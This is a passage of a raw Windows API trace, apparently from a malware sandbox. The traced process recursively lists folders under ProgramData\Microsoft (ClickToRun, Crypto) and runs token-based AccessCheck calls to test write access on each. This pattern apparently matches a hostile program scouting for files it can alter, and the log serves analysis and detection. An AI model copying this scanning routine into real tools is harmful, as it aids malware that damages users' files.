FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*", lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0x5fc3d8 [0106.059] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281aa30) returned 0 [0106.059] GetLastError () returned 0x7a [0106.059] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", RequestedInformation=0x7, pSecurityDescriptor=0x571728, nLength=0x90, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x571728, lpnLengthNeeded=0x281aa30) returned 1 [0106.059] GetLastError () returned 0x7a [0106.059] GetCurrentThread () returned 0xfffffffe [0106.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x0) returned 0 [0106.059] GetCurrentProcess () returned 0xffffffff [0106.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x344) returned 1 [0106.059] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281aa34 | out: DuplicateTokenHandle=0x281aa34*=0x348) returned 1 [0106.059] MapGenericMask (in: AccessMask=0x281aa44, GenericMapping=0x281aa14 | out: AccessMask=0x281aa44) [0106.059] AccessCheck (in: pSecurityDescriptor=0x571728, ClientToken=0x348, DesiredAccess=0x120116, GenericMapping=0x281aa14, PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c | out: PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c) returned 1 [0106.059] CloseHandle (hObject=0x348) returned 1 [0106.059] CloseHandle (hObject=0x344) returned 1 [0106.059] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.059] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0 [0106.059] FindClose (in: hFindFile=0x5fc3d8 | out: hFindFile=0x5fc3d8) returned 1 [0106.059] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.059] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0106.059] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.059] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.059] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.060] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.060] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.060] GetLastError () returned 0x7a [0106.060] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.060] GetLastError () returned 0x7a [0106.060] GetCurrentThread () returned 0xfffffffe [0106.060] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.060] GetCurrentProcess () returned 0xffffffff [0106.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0106.060] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.060] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.060] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.060] CloseHandle (hObject=0x32c) returned 1 [0106.060] CloseHandle (hObject=0x33c) returned 1 [0106.060] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.060] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.060] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0106.060] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.061] GetLastError () returned 0x7a [0106.061] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281afc8) returned 1 [0106.107] GetLastError () returned 0x7a [0106.107] GetCurrentThread () returned 0xfffffffe [0106.107] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.107] GetCurrentProcess () returned 0xffffffff [0106.107] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x350) returned 1 [0106.107] DuplicateToken (in: ExistingTokenHandle=0x350, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x354) returned 1 [0106.108] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.108] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x354, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.108] CloseHandle (hObject=0x354) returned 1 [0106.108] CloseHandle (hObject=0x350) returned 1 [0106.108] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.108] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.108] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394\\en-us.16\\*", lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0x5fc3d8 [0106.108] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281aa30) returned 0 [0106.109] GetLastError () returned 0x7a [0106.109] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x90, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281aa30) returned 1 [0106.109] GetLastError () returned 0x7a [0106.109] GetCurrentThread () returned 0xfffffffe [0106.109] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x0) returned 0 [0106.109] GetCurrentProcess () returned 0xffffffff [0106.109] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x354) returned 1 [0106.109] DuplicateToken (in: ExistingTokenHandle=0x354, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281aa34 | out: DuplicateTokenHandle=0x281aa34*=0x358) returned 1 [0106.109] MapGenericMask (in: AccessMask=0x281aa44, GenericMapping=0x281aa14 | out: AccessMask=0x281aa44) [0106.109] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x358, DesiredAccess=0x120116, GenericMapping=0x281aa14, PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c | out: PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c) returned 1 [0106.109] CloseHandle (hObject=0x358) returned 1 [0106.109] CloseHandle (hObject=0x354) returned 1 [0106.109] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.109] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.109] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.109] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.109] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.109] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.109] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0 [0106.109] FindClose (in: hFindFile=0x5fc3d8 | out: hFindFile=0x5fc3d8) returned 1 [0106.109] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.109] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394\\x-none.16\\*", lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0x5fc3d8 [0106.110] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281aa30) returned 0 [0106.110] GetLastError () returned 0x7a [0106.110] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\7D4151FA-0263-42FB-99EC-A401902FE394\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x90, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281aa30) returned 1 [0106.110] GetLastError () returned 0x7a [0106.110] GetCurrentThread () returned 0xfffffffe [0106.110] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x0) returned 0 [0106.110] GetCurrentProcess () returned 0xffffffff [0106.110] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x354) returned 1 [0106.110] DuplicateToken (in: ExistingTokenHandle=0x354, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281aa34 | out: DuplicateTokenHandle=0x281aa34*=0x358) returned 1 [0106.110] MapGenericMask (in: AccessMask=0x281aa44, GenericMapping=0x281aa14 | out: AccessMask=0x281aa44) [0106.110] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x358, DesiredAccess=0x120116, GenericMapping=0x281aa14, PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c | out: PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c) returned 1 [0106.110] CloseHandle (hObject=0x358) returned 1 [0106.110] CloseHandle (hObject=0x354) returned 1 [0106.110] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.110] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.110] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.110] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.110] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.110] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.110] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0 [0106.111] FindClose (in: hFindFile=0x5fc3d8 | out: hFindFile=0x5fc3d8) returned 1 [0106.111] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.111] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0106.111] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.111] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.112] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.112] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.113] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\UserData", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.113] GetLastError () returned 0x7a [0106.113] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\UserData", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.113] GetLastError () returned 0x7a [0106.113] GetCurrentThread () returned 0xfffffffe [0106.113] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.113] GetCurrentProcess () returned 0xffffffff [0106.113] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x350) returned 1 [0106.113] DuplicateToken (in: ExistingTokenHandle=0x350, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x354) returned 1 [0106.113] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.113] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x354, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.113] CloseHandle (hObject=0x354) returned 1 [0106.113] CloseHandle (hObject=0x350) returned 1 [0106.113] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.113] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.113] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.113] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.113] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.124] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.124] GetLastError () returned 0x7a [0106.124] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", RequestedInformation=0x7, pSecurityDescriptor=0x5716a8, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x5716a8, lpnLengthNeeded=0x281b560) returned 1 [0106.124] GetLastError () returned 0x7a [0106.124] GetCurrentThread () returned 0xfffffffe [0106.124] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.124] GetCurrentProcess () returned 0xffffffff [0106.124] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x350) returned 1 [0106.125] DuplicateToken (in: ExistingTokenHandle=0x350, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x354) returned 1 [0106.125] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.125] AccessCheck (in: pSecurityDescriptor=0x5716a8, ClientToken=0x354, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.125] CloseHandle (hObject=0x354) returned 1 [0106.125] CloseHandle (hObject=0x350) returned 1 [0106.125] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.152] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.152] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.155] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.155] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.155] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.155] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.155] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.155] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.155] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.156] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.157] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.157] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.157] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.157] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.157] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.157] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.157] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.157] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.158] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.159] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.159] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.164] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.164] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.164] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.164] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.165] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.165] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.165] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.165] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.165] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.165] GetLastError () returned 0x7a [0106.165] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.165] GetLastError () returned 0x7a [0106.165] GetCurrentThread () returned 0xfffffffe [0106.165] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.165] GetCurrentProcess () returned 0xffffffff [0106.165] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.165] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.166] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.166] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.166] CloseHandle (hObject=0x344) returned 1 [0106.166] CloseHandle (hObject=0x33c) returned 1 [0106.166] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.166] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.166] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.166] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\DSS", RequestedInformation=0x7, 